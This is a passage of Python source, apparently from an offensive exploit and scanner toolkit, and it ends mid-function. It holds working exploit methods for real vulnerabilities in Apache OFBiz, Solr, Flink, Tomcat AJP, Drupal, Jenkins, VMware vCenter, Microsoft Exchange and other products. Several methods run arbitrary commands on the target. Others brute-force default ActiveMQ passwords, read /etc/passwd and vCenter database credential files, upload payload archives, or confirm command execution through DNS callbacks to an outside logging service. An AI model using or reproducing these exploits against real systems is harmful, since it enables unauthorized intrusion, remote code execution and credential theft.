def cve_2021_30128_exp(self, cmd):
vul_name = "Apache OFBiz: CVE-2021-30128"
headers = {
'User-Agent': self.ua,
'Content-Type': 'text/xml',
'Connection': 'close'
}
def _trans(s):
return "%s" % ''.join('%.2x' % x for x in s)
try:
dns_data = bytes(cmd, encoding="utf8")
dns_hex = _trans(dns_data)
#print(cmd)
#print(dns_hex)
data = self.payload_cve_2021_30128_exp.replace(
"RECOMMAND", dns_hex)
url = urljoin(self.url, "/webtools/control/SOAPService")
#print(data)
request = requests.post(url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
if request.status_code == 200:
r = "Command Executed Successfully (But No Echo)"
else:
r = "Command Executed Failed... ..."
verify.exploit_print(r, self.raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception as e:
verify.error_print(vul_name)
def time_2021_0515_exp(self, cmd):
vul_name = "E-cology OA WorkflowServiceXml RCE: time-2021-0515"
url = urljoin(self.url, "/services%20/WorkflowServiceXml")
headers = {
'User-Agent': self.ua,
'SOAPAction': '""',
'cmd': cmd,
"Content-Type": "text/xml;charset=UTF-8"
}
data = self.payload_time_2021_0515
try:
request = requests.post(url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
verify.exploit_print(request.text, self.raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception:
verify.error_print(vul_name)
def cve_2019_17558_exp(self, cmd):
vul_name = "Apache Solr: CVE-2019-17558"
core_name = None
payload_2 = self.payload_cve_2019_17558.replace("RECOMMAND", cmd)
url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
try:
request = requests.get(url_core, headers=self.headers, timeout=self.timeout, verify=False)
try:
core_name = list(json.loads(request.text)["status"])[0]
except AttributeError:
pass
url_api = self.url + "/solr/" + str(core_name) + "/config"
headers_json = {'Content-Type': 'application/json', 'User-Agent': self.ua}
set_api_data = """
{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}
"""
request = requests.post(url_api, data=set_api_data, headers=headers_json, timeout=self.timeout, verify=False)
request = requests.get(self.url + "/solr/" + str(core_name) + payload_2, headers=self.headers,
timeout=self.timeout, verify=False)
raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
verify.exploit_print(request.text, raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception:
verify.error_print(vul_name)
def cve_2018_7602_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Drupal: CVE-2018-7602"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info[
"vul_name"] = "Drupal drupalgeddon2 remote code execution"
self.vul_info["vul_numb"] = "CVE-2018-7602"
self.vul_info["vul_apps"] = "Drupal"
self.vul_info["vul_date"] = "2018-06-19"
self.vul_info["vul_vers"] = "< 7.59, < 8.5.3"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "远程代码执行"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "这个漏洞是CVE-2018-7600的绕过利用,两个漏洞原理是一样的。" \
"攻击者可以通过不同方式利用该漏洞远程执行代码。" \
"CVE-2018-7602这个漏洞是CVE-2018-7600的另一个利用点,只是入口方式不一样。"
self.vul_info["cre_date"] = "2021-01-29"
self.vul_info["cre_auth"] = "zhzyker"
DRUPAL_U = "admin"
DRUPAL_P = "admin"
md = random_md5()
cmd = "echo " + md
try:
self.session = requests.Session()
self.get_params = {'q': 'user/login'}
self.post_params = {
'form_id': 'user_login',
'name': DRUPAL_U,
'pass': DRUPAL_P,
'op': 'Log in'
}
self.session.post(self.url,
params=self.get_params,
data=self.post_params,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.get_params = {'q': 'user'}
self.r = self.session.get(self.url,
params=self.get_params,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.soup = BeautifulSoup(self.r.text, "html.parser")
self.user_id = self.soup.find('meta', {
'property': 'foaf:name'
}).get('about')
if "?q=" in self.user_id:
self.user_id = self.user_id.split("=")[1]
self.get_params = {'q': self.user_id + '/cancel'}
self.r = self.session.get(self.url,
params=self.get_params,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.soup = BeautifulSoup(self.r.text, "html.parser")
self.form = self.soup.find('form',
{'id': 'user-cancel-confirm-form'})
self.form_token = self.form.find('input', {
'name': 'form_token'
}).get('value')
self.get_params = {
'q':
self.user_id + '/cancel',
'destination':
self.user_id +
'/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]='
+ cmd
}
self.post_params = {
'form_id': 'user_cancel_confirm_form',
'form_token': self.form_token,
'_triggering_element_name': 'form_id',
'op': 'Cancel account'
}
self.r = self.session.post(self.url,
params=self.get_params,
data=self.post_params,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.soup = BeautifulSoup(self.r.text, "html.parser")
self.form = self.soup.find('form',
{'id': 'user-cancel-confirm-form'})
self.form_build_id = self.form.find('input', {
'name': 'form_build_id'
}).get('value')
self.get_params = {
'q':
'file/ajax/actions/cancel/#options/path/' + self.form_build_id
}
self.post_params = {'form_build_id': self.form_build_id}
self.r = self.session.post(self.url,
params=self.get_params,
data=self.post_params,
headers=self.headers,
timeout=self.timeout,
verify=False)
if md in misinformation(self.r.text, md):
self.vul_info["vul_data"] = dump.dump_all(self.r).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info[
"vul_payd"] = '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd
self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]"
else:
self.request = requests.get(self.url + "/CHANGELOG.txt",
data=self.payload,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.rawdata = dump.dump_all(self.request).decode(
'utf-8', 'ignore')
self.allver = re.findall(r"([\d][.][\d]?[.]?[\d])",
self.request.text)
if self.request.status_code == 200 and r"Drupal" in self.request.text:
if '7.59' not in self.allver and '8.5.3' not in self.allver:
self.vul_info["vul_data"] = dump.dump_all(
self.r).decode('utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoC_MaYbE"
self.vul_info[
"vul_payd"] = '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd
self.vul_info[
"prt_info"] = "[maybe] [rce] [cmd:" + cmd + "]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as error:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2015_5254_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Apache AcitveMQ: CVE-2015-5254"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "Apache Flink 反序列化漏洞"
self.vul_info["vul_numb"] = "CVE-2015-5254"
self.vul_info["vul_apps"] = "AcitveMQ"
self.vul_info["vul_date"] = "2015-07-01"
self.vul_info["vul_vers"] = "< 5.13.0"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "反序列化漏洞"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的" \
"Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。"
self.vul_info["cre_date"] = "2021-01-07"
self.vul_info["cre_auth"] = "zhzyker"
self.passlist = [
"admin:123456", "admin:admin", "admin:123123", "admin:activemq",
"admin:12345678"
]
self.ver = 5555
try:
try:
for self.pa in self.passlist:
self.base64_p = base64.b64encode(str.encode(self.pa))
self.p = self.base64_p.decode('utf-8')
self.headers_base64 = {
'User-Agent': self.ua,
'Authorization': 'Basic ' + self.p
}
self.request = requests.get(self.url + "/admin",
headers=self.headers_base64,
timeout=self.timeout,
verify=False)
self.rawdata = dump.dump_all(self.request).decode(
'utf-8', 'ignore')
if self.request.status_code == 200:
self.vul_info["vul_payd"] = self.pa
self.get_ver = re.findall("<td><b>(.*)</b></td>",
self.request.text)[1]
self.ver = self.get_ver.replace(".", "")
break
except IndexError:
pass
if int(self.ver) < 5130:
self.vul_info["vul_data"] = dump.dump_all(self.request).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoC_MaYbE"
self.vul_info[
"prt_info"] = "[maybe] [version: " + self.get_ver + "] [version check]"
verify.scan_print(self.vul_info)
else:
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
print(e)
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def time_2021_0410_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "QiAnXin NS-NGFW: time-2021-0410"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info[
"vul_name"] = "Qianxin NS-NGFW Netkang Next Generation Firewall Front RCE"
self.vul_info["vul_numb"] = "time-2021-0415"
self.vul_info["vul_apps"] = "QiAnXin"
self.vul_info["vul_date"] = "2021-04-10"
self.vul_info["vul_vers"] = "unknow"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "RCE"
self.vul_info["vul_data"] = "null"
self.vul_info[
"vul_desc"] = "Qianxin NS-NGFW Netkang Next Generation Firewall Front RCE"
self.vul_info["cre_date"] = "2021-04-16"
self.vul_info["cre_auth"] = "zhzyker"
url = urljoin(self.url, "/directdata/direct/router")
md = random_md5()
cmd = "echo " + md
data = {
"action":
"SSLVPN_Resource",
"method":
"deleteImage",
"data": [{
"data": [
"/var/www/html/d.txt;" + cmd + " > /var/www/html/" + md +
".txt"
]
}],
"type":
"rpc",
"tid":
17
}
data = json.dumps(data)
try:
request = requests.post(url,
data=data,
headers=self.headers,
timeout=self.timeout,
verify=False)
url = urljoin(self.url, md + ".txt")
req = requests.get(url,
data="1",
headers=self.headers,
timeout=self.timeout,
verify=False)
if md in misinformation(req.text, md) and (
md + ".txt") not in req.text and req.status_code == 200:
self.vul_info["vul_data"] = dump.dump_all(request).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["vul_payd"] = data
self.vul_info["prt_info"] = "[rce:" + url + " ]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as error:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2020_17518_poc(self):
# 2020-01-07
self.threadLock.acquire()
self.name = random_md5()
self.vul_info["prt_name"] = "Apache Flink: CVE-2020-17518"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info[
"vul_payd"] = 'Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/' + self.name
self.vul_info["vul_name"] = "Apache Flink 任意文件写入漏洞"
self.vul_info["vul_numb"] = "CVE-2020-17518"
self.vul_info["vul_apps"] = "Flink"
self.vul_info["vul_date"] = "2021-01-05"
self.vul_info["vul_vers"] = "< 1.11.3 or < 1.12.0"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "任意文件写入"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "Apache Flink 1.11.0中引入了一项更新,该更新在1.11.1及更高的版本和1.11.2中发布。" \
"Apache Flink 控制面板的Submit New Job处存在任意文件上传:"
self.vul_info["cre_date"] = "2021-01-07"
self.vul_info["cre_auth"] = "zhzyker"
self.info = "null"
self.method = "post"
self.r = "PoCWating"
self.headers = {
'User-Agent':
self.ua,
'Connection':
'close',
'Content-Type':
'multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y'
}
self.data = '\n------WebKitFormBoundaryoZ8meKnrrso89R6Y'
self.data += '\nContent-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/' + self.name
self.data += '\n\nsuccess'
self.data += '\n------WebKitFormBoundaryoZ8meKnrrso89R6Y--'
try:
self.r404 = requests.get(self.url + "/jars/upload",
headers=self.headers,
timeout=self.timeout,
verify=False)
self.request = requests.post(self.url + "/jars/upload",
data=self.data,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.rawdata = dump.dump_all(self.request).decode(
'utf-8', 'ignore')
if self.r404.status_code == 404 and self.request.status_code == 400:
if r"org.apache.flink.runtime.rest.handler.RestHandlerException:" in self.request.text:
self.vul_info["vul_data"] = dump.dump_all(
self.request).decode('utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoC_MaYbE"
self.vul_info[
"prt_info"] = "[maybe] [upload: /tmp/" + self.name + "]"
verify.scan_print(self.vul_info)
else:
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2020_1938_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Apache Tomcat: CVE-2020-1938"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "WEB-INF/web.xml"
self.vul_info["vul_name"] = "Tomcat ajp13 协议任意文件读取"
self.vul_info["vul_numb"] = "CVE-2020-1938"
self.vul_info["vul_apps"] = "Tomcat"
self.vul_info["vul_date"] = "2020-02-20"
self.vul_info["vul_vers"] = "< 7.0.100, < 8.5.51, < 9.0.31"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "任意文件读取 "
self.vul_info["vul_data"] = ">_< Tomcat cve-2020-2019 vulnerability uses AJP protocol detection\n" \
">_< So there is no HTTP protocol request and response"
self.vul_info["vul_desc"] = "该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数," \
"读取服务器webapp下的任意文件。若目标服务器同时存在文件上传功能,攻击者可进一步实现远程代码执行。"
self.vul_info["cre_date"] = "2021-01-21"
self.vul_info["cre_auth"] = "zhzyker"
headers = self.headers
self.output_method = "ajp"
self.default_port = self.port
self.default_requri = '/'
self.default_headers = {}
self.username = None
self.password = None
self.getipport = urlparse(self.url)
self.hostname = self.getipport.hostname
self.request = "null"
self.default_file = "WEB-INF/web.xml"
try:
socket.setdefaulttimeout(self.timeout)
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.connect((self.hostname, self.default_port))
self.stream = self.socket.makefile("rb",
buffering=0) # PY2: bufsize=0
self.attributes = [
{
'name': 'req_attribute',
'value': ['javax.servlet.include.request_uri', '/']
},
{
'name': 'req_attribute',
'value':
['javax.servlet.include.path_info', self.default_file]
},
{
'name': 'req_attribute',
'value': ['javax.servlet.include.servlet_path', '/']
},
]
method = 'GET'
self.forward_request = ApacheTomcat.__prepare_ajp_forward_request(
self,
self.hostname,
self.default_requri,
method=AjpForwardRequest.REQUEST_METHODS.get(method))
if self.username is not None and self.password is not None:
self.forward_request.request_headers[
'SC_REQ_AUTHORIZATION'] = "Basic " + str(
("%s:%s" % (self.username, self.password)
).encode('base64').replace("\n"
""))
for h in self.default_headers:
self.forward_request.request_headers[h] = headers[h]
for a in self.attributes:
self.forward_request.attributes.append(a)
self.responses = self.forward_request.send_and_receive(
self.socket, self.stream)
if len(self.responses) == 0:
return None, None
self.snd_hdrs_res = self.responses[0]
self.data_res = self.responses[1:-1]
self.request = (b"".join([d.data for d in self.data_res]).decode())
if r"Welcome to Tomcat" in self.request and r"You may obtain a copy of the License at" in self.request:
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["prt_info"] = "[ajp13] [port:" + str(
self.default_port) + " file:" + self.default_file + "]"
verify.scan_print(self.vul_info)
except socket.timeout:
verify.timeout_print(self.vul_info["prt_name"])
except Exception as error:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2019_17558_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Apache Solr: CVE-2019-17558"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = self.payload_cve_2019_17558.replace(
"RECOMMAND", "whoami")
self.vul_info[
"vul_name"] = "Apache Solr Velocity template Remote Code Execution"
self.vul_info["vul_numb"] = "CVE-2018-17558"
self.vul_info["vul_apps"] = "Solr"
self.vul_info["vul_date"] = "2017-10-16"
self.vul_info["vul_vers"] = "5.0.0 - 8.3.1"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "Remote Code Execution"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "用户可以注入自定义模板,通过Velocity模板语言执行任意命令。"
self.vul_info["cre_auth"] = "zhzyker"
core_name = None
md = random_md5()
cmd = "ping " + md + "." + self.ceye_domain
payload_2 = self.payload_cve_2019_17558.replace("RECOMMAND", cmd)
url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
try:
request = requests.get(url_core,
headers=self.headers,
timeout=self.timeout,
verify=False)
try:
core_name = list(json.loads(request.text)["status"])[0]
except:
pass
url_api = self.url + "/solr/" + str(core_name) + "/config"
headers_json = {
'Content-Type': 'application/json',
'User-Agent': self.ua
}
set_api_data = """
{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}
"""
r = requests.post(url_api,
data=set_api_data,
headers=headers_json,
timeout=self.timeout,
verify=False)
req = requests.get(self.url + "/solr/" + str(core_name) +
payload_2,
headers=self.headers,
timeout=self.timeout,
verify=False)
request = requests.get(self.ceye_api + self.ceye_token)
if md in request.text:
self.vul_info["vul_data"] = dump.dump_all(req).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info[
"prt_info"] = "[corename: " + self.url + "/solr/" + core_name + " ]"
verify.scan_print(self.vul_info)
elif self.vul_info[
"prt_resu"] != "PoCSuCCeSS" and r.status_code == 200 and core_name is not None:
self.vul_info["vul_data"] = dump.dump_all(req).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoC_MaYbE"
self.vul_info[
"prt_info"] = "[maybe] [corename: " + self.url + "/solr/" + core_name + " ]"
verify.scan_print(self.vul_info)
else:
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2018_1000861_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Jenkins: CVE-2018-1000861"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = self.payload_cve_2018_1000861.replace(
"RECOMMAND", "whoami")
self.vul_info["vul_name"] = "Jenkins 远程代码执行漏洞"
self.vul_info["vul_numb"] = "CVE-2018-1000861"
self.vul_info["vul_apps"] = "Jenkins"
self.vul_info["vul_date"] = "2018-01-29"
self.vul_info["vul_vers"] = "<= 2.153, LTS <= 2.138.3"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "远程代码执行漏洞"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "Jenkins 2.153和更早版本,LTS 2.138.3和更早版本使用的Stapler Web框架中的订书机" \
"/core/src/main/java/org/kohsuke/stapler/MetaClass.java中存在一个代码执行漏洞," \
"攻击者可以使用该方法调用某些方法通过访问不希望以这种方式调用的特制URL来访问Java对象。"
self.vul_info["cre_date"] = "2021-01-21"
self.vul_info["cre_auth"] = "zhzyker"
md = random_md5()
cmd = "echo " + md
self.c_echo = "echo \":-)\" > $JENKINS_HOME/war/robots.txt;" + cmd + " >> $JENKINS_HOME/war/robots.txt"
self.c_base = base64.b64encode(str.encode(self.c_echo))
self.c_cmd = self.c_base.decode('ascii')
self.cmd = urllib.parse.quote(self.c_cmd)
self.payload = self.payload_cve_2018_1000861.replace(
"RECOMMAND", self.cmd)
try:
try:
self.request = requests.get(self.url,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.jenkins_version = self.request.headers['X-Jenkins']
self.ver = " [version:" + self.jenkins_version + "]"
except:
pass
self.r = requests.get(self.url + self.payload,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.request = requests.get(self.url + "/robots.txt",
headers=self.headers,
timeout=self.timeout,
verify=False)
if md in self.request.text:
self.vul_info["vul_data"] = dump.dump_all(self.r).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info[
"prt_info"] = "[rce] [url: " + self.url + "/robots.txt ] "
else:
self.c_echo = "ping " + md + "." + self.ceye_domain
self.c_base = base64.b64encode(str.encode(self.c_echo))
self.c_cmd = self.c_base.decode('ascii')
self.cmd = urllib.parse.quote(self.c_cmd)
self.payload = self.payload_cve_2018_1000861.replace(
"RECOMMAND", self.cmd)
self.req = requests.get(self.url + self.payload,
headers=self.headers,
timeout=self.timeout,
verify=False)
ceye = requests.get(self.ceye_api + self.ceye_token)
if md in ceye.text:
self.vul_info["vul_data"] = dump.dump_all(self.req).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info[
"prt_info"] = "[ceye] [cmd: " + self.c_echo + "]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2021_21972_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Vmware vCenter: CVE-2021-21972"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "Vmware vCenter 任意文件上传"
self.vul_info["vul_numb"] = "CVE-2021-21972"
self.vul_info["vul_apps"] = "Vmware"
self.vul_info["vul_date"] = "2021-02-24"
self.vul_info[
"vul_vers"] = "7.0 < 7.0 U1c, 6.7 < 6.7 U3l, 6.5 < 6.5 U3n"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "任意文件上传"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "未经授权的文件上传会导致远程执行代码(RCE)(CVE-2021-21972)"
self.vul_info["cre_date"] = "2021-02-25"
self.vul_info["cre_auth"] = "zhzyker"
headers = {
"User-agent": self.ua,
"Connection": "close",
"Content-Type": "application/x-www-form-urlencoded"
}
try:
url = urljoin(self.url,
"/ui/vropspluginui/rest/services/uploadova")
res = requests.get(url,
headers=headers,
timeout=self.timeout,
verify=False)
if res.status_code == 405:
self.vul_info["vul_data"] = dump.dump_all(res).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoC_MaYbE"
self.vul_info["vul_payd"] = url
self.vul_info["prt_info"] = "[upload] [url:" + url + " ]"
headers = {
"User-Agent": self.ua,
"Accept": "*/*",
"Connection": "close"
}
path = os.path.split(os.path.realpath(sys.argv[0]))[0]
linux_tar = path + "/payload/payload/cve202121972_linux.tar"
file = {'uploadFile': open(linux_tar, 'rb')}
url = urljoin(self.url,
"/ui/vropspluginui/rest/services/uploadova")
r = requests.post(url,
files=file,
headers=headers,
timeout=self.timeout,
verify=False)
url = requests.compat.urljoin(self.url,
"/ui/resources/vvvvvv.txt")
req = requests.get(url,
headers=headers,
timeout=self.timeout,
verify=False)
if r"upload" in req.text:
self.vul_info["vul_data"] = dump.dump_all(r).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["vul_payd"] = linux_tar
self.vul_info[
"prt_info"] = "[upload] [os:linux] [url:" + url + " ]"
else:
windows_tar = path + "/payload/payload/cve202121972_windows.tar"
file = {'uploadFile': open(windows_tar, 'rb')}
url = requests.compat.urljoin(
self.url, "/ui/vropspluginui/rest/services/uploadova")
r = requests.post(url,
files=file,
headers=headers,
timeout=self.timeout,
verify=False)
url = requests.compat.urljoin(self.url,
"/ui/resources/vvvvvv.txt")
req = requests.get(url,
headers=headers,
timeout=self.timeout,
verify=False)
if r"upload" in req.text:
self.vul_info["vul_data"] = dump.dump_all(r).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["vul_payd"] = windows_tar
self.vul_info[
"prt_info"] = "[upload] [os:windows] [url:" + url + " ]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as error:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def time_2020_1013_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Vmware vCenter: time-2020-10-13 (not cve)"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "Vmware vCenter 任意文件读取"
self.vul_info["vul_numb"] = "time-2020-10-13"
self.vul_info["vul_apps"] = "Vmware"
self.vul_info["vul_date"] = "2020-10-13"
self.vul_info["vul_vers"] = "<= 6.5u1"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "任意文件读取"
self.vul_info["vul_data"] = "null"
self.vul_info[
"vul_desc"] = "Unauthenticated Arbitrary File Read vulnerability in VMware vCenter. VMware revealed that this vulnerability was patched in 6.5u1, but no CVE was assigned."
self.vul_info["cre_date"] = "2021-02-26"
self.vul_info["cre_auth"] = "zhzyker"
headers = {
"User-agent": self.ua,
"Connection": "close",
}
try:
url = urljoin(self.url, "/eam/vib?id=/etc/passwd")
res = requests.get(url,
headers=headers,
timeout=self.timeout,
verify=False)
if res.status_code == 200 and r"root:/bin/bash" in res.text and r"root:x:0:0" in res.text:
self.vul_info["vul_data"] = dump.dump_all(res).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["vul_payd"] = url
self.vul_info[
"prt_info"] = "[file] [os:linux] [url:" + url + " ]"
else:
url = urljoin(
self.url,
"/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties"
)
res = requests.get(url,
headers=headers,
timeout=self.timeout,
verify=False)
if res.status_code == 200 and r"username" in res.text and r"password" in res.text and r"dirver" in res.text:
self.vul_info["vul_data"] = dump.dump_all(res).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["vul_payd"] = url
self.vul_info[
"prt_info"] = "[file] [os:windows] [url:" + url + " ]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as error:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2021_27065_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Microsoft Exchange: CVE-2021-27065"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info[
"vul_name"] = "Microsoft Exchange Server Arbitrary File Write"
self.vul_info["vul_numb"] = "CVE-2021-27065"
self.vul_info["vul_apps"] = "Exchange"
self.vul_info["vul_date"] = "2021-03-03"
self.vul_info["vul_vers"] = "Exchange Server 2010 2013 2016 2019"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "Arbitrary File Write"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "Exchange 中身份验证后的任意文件写入漏洞。攻击者可以通过 Exchange 服务器进行身份验证," \
"同时可以利用漏洞将文件写入服务器上的任何路径。也可以通过利用 CVE-2021-26855 SSRF " \
"漏洞组合进行getshell。"
self.vul_info["cre_date"] = "2021-03-12"
self.vul_info["cre_auth"] = "zhzyker"
def __unpack_str(byte_string):
return byte_string.decode('UTF-8').replace('\x00', '')
def __unpack_int(format, data):
return unpack(format, data)[0]
def __exploit(url, name, path, qs='', data='', cookies=[], headers={}):
cookies = list(cookies)
cookies.extend([
'X-BEResource=a]@%s:444%s?%s#~1941962753' % (name, path, qs),
])
if not headers:
headers = {'Content-Type': 'application/json'}
headers['Cookie'] = ';'.join(cookies)
headers['msExchLogonMailbox'] = 'S-1-5-20'
try:
r = requests.post(url + "/ecp/y.js",
headers=headers,
data=data,
verify=False,
allow_redirects=False)
return r
except:
return False
def _get_sid(url, name, mail):
payload = '''
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
<Request>
<EMailAddress>%s</EMailAddress>
